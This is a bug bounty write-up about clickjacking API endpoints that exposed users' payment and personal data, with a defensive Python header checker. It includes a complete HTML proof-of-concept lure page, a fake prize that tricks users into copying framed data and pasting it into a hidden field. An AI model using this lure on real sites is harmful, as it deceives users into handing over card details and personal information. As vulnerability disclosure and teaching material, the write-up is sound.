$1800 worth Clickjacking

Osama Avvan
Jun 21, 2019 · 2 min read

In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where sensitive user information was disclosed. It was a private program on Bugcrowd.

There were some API endpoints that disclosed user information such as credit card data, email, name, phone, address, user ID, etc.

Since none of these endpoints sent an X-Frame-Options header, I was able to load them in an iframe.
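Whether an endpoint can be framed comes down to two response headers, so the checker below is an added example (not the author's code) that evaluates X-Frame-Options and the CSP frame-ancestors directive over constructed sample responses, including the deprecated ALLOW-FROM value that modern browsers ignore, and shows the headers that would have closed this finding. The endpoint paths and header values in it are made up for illustration.

```python
"""Flag HTTP responses that a third-party page could load in an iframe.

Browsers honour two anti-framing controls: the legacy X-Frame-Options header
and the CSP frame-ancestors directive. When both are present, frame-ancestors
takes precedence, so it is evaluated first.
"""
from typing import Dict, List, Optional


def _csp_frame_ancestors(csp: str) -> Optional[str]:
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            # An empty source list is equivalent to 'none' per the CSP spec.
            return " ".join(parts[1:]).lower() or "'none'"
    return None


def is_frameable(headers: Dict[str, str]) -> bool:
    """True if an unrelated origin could embed this response in an iframe."""
    h = {k.lower(): v for k, v in headers.items()}
    fa = _csp_frame_ancestors(h.get("content-security-policy", ""))
    if fa is not None:
        # 'none', 'self' or an explicit origin allow-list blocks third parties;
        # a wildcard or scheme-only source (https:) lets any site frame the page.
        return any(src in ("*", "http:", "https:") for src in fa.split())
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    # Missing, or an unrecognised value such as ALLOW-FROM (dropped by modern
    # browsers), leaves the endpoint frameable.
    return True


def frameable_endpoints(responses: Dict[str, Dict[str, str]]) -> List[str]:
    """Return the paths whose response headers do not prevent framing."""
    return sorted(path for path, hdrs in responses.items() if is_frameable(hdrs))


# Constructed sample responses; paths and values are illustrative only.
SAMPLE_RESPONSES = {
    "/api/v1/wallet/payments": {"Content-Type": "application/json"},
    "/api/v1/profile": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "/account": {"X-Frame-Options": "SAMEORIGIN"},
    "/dashboard": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
}

# Headers an API returning user data should send; either one alone suffices in
# current browsers, sending both covers older clients too.
HARDENED_HEADERS = {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'"}

if __name__ == "__main__":
    for path in frameable_endpoints(SAMPLE_RESPONSES):
        print(f"frameable: {path}")
```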

Next I had to create an HTML page that tricks the user into handing over their information, so I built the following page.



<!DOCTYPE html>
<html>
<body>
<div id="parent">
  <center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win $100</h1></center>
  <h3>Click inside the box and Press CTRL+A then CTRL+C</h3>
  <div style="border: 2px solid gray;">
    <!-- the vulnerable endpoint is loaded almost invisibly inside the bordered box -->
    <iframe src="https://example.com/api/v1/wallet/payments?language=en" width="100%" style="opacity: 0.01"></iframe>
  </div>
  <h3>Click inside the box and press CTRL+V</h3>
  <input type="password" name="" size="1">
  <!-- <textarea rows="1" cols="1" style="resize: none;"></textarea> -->
  <button id="btn">Click to Win</button>
</div>
<script>
document.querySelector("#btn").onclick = function() {
  // the pasted API response is written to the console, as described below
  console.log(document.querySelector("input").value);
  alert("Congratulation! You have won $100");
};
</script>
</body>
</html>


After performing all the steps, when the user clicks the button, his/her information is logged in the console.


So that was it, thank you for reading.
